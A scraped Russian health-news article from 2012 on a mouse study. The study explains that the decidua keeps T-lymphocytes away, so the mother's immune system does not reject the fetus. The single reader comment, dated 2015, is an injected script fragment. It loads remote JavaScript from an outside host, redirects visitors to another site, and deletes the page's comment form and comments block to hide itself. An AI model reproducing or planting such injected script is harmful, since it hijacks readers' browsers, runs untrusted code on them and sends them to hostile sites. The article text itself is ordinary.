Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Какие механизмы помогают ...  >>  Какие механизмы помогают выносить беременность?
 
Обратная связь
 

Какие механизмы помогают выносить беременность?

Размер шрифта
25 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американским ученым удалось ответить на давний вопрос, почему иммунная система матери не отторгает плод во время беременности.

Работа иммунной системы

В норме в ответ на появление в организме чужеродных элементов, будь то возбудитель инфекции или пересаженный орган, развивается местное воспаление. Это воспаление сопровождается иммунным ответом, который заключается в выработке особых веществ хемокинов. Эти вещества способствуют накоплению в очаге воспаления клеток иммунной системы, в т.ч. T-лимфоцитов, которые атакуют возбудителя инфекции или пересаженный орган.

Однако во время беременности наблюдается довольно интересная ситуация. Несмотря на то, что плод и плацента – чужеродные элементы для организма матери – напрямую контактируют с клетками иммунной системы, они не отторгаются, как это происходит с пересаженными органами.

Суть исследования

Несколько лет назад ученые обнаружили, что клетки иммунной системы, которые должны атаковать плод, воспринимая его как чужеродный элемент, не выполняют свою функцию. Это навело ученых на мысль о том, что существует некий барьер, который защищает плод от T-лимфоцитов. Исследования на мышах подтвердили эту гипотезу.

Оказалось, что во время беременности происходит выключение генов, которые отвечают за перемещение T-лимфоцитов к месту воспаления. Выключение генов осуществляет децидуальная оболочка, которая окружает плод и плаценту. Таким образом, T-лимфоциты не накапливаются в децидуальной оболочке и не атакуют плод и плаценту.

Результаты

Полученные результаты дают представление о механизмах, благодаря которым организм матери не отторгает плод.

Оказывается, во время беременности происходит подавление активности клеток, которые выделяют вещества, обеспечивающие перемещение T-лимфоцитов к месту воспаления. Получается, что децидуальная оболочка является зоной относительной иммуннологической неактивности.

Нарушение регуляции этого процесса приводит к развитию воспаления и накоплению клеток иммунной системы в том месте, где происходит контакт между организмами матери и плода. Подобная ситуация может сопровождаться такими осложнениями беременности, как преждевременные роды, выкидыш и преэклампсия (повышение артериального давления и появление белка в моче у беременных женщин).

Благодаря представленному исследованию ученым, наконец, удалось ответить на один из фундаментальных вопросов медицины и понять почему организм матери не отторгает плод во время беременности. Кроме того, открытие способа регулирования перемещения T-лимфоцитов в периферические ткани позволит по-новому взглянуть на огромное количество заболеваний.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мама может спасти своего ребенка от стресса   Никотин и внематочная беременность   Более миллиона беременных женщин заражены сифилисом! Вы можете быть среди них!   Жизнь наследника британской короны под угрозой  
08 февраля 2013Ожирение можно предсказать сразу после рождения 07 декабря 2012Жизнь наследника британской короны под угрозой
 
25 июля 2012Скоро мы сможем восстанавливаться после травм как ящерицы! 24 июля 2012Организм матери считает плод чужеродным элементом!
 

Слайдшоу

1
Вся правда о месячных и беременности
11 способов узнать, что ты беременна
Что мешает вам забеременеть

Тесты

1
Что есть будущим мамам?
Что вы знаете о груди?
Что вы знаете о грудном вскармливании?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.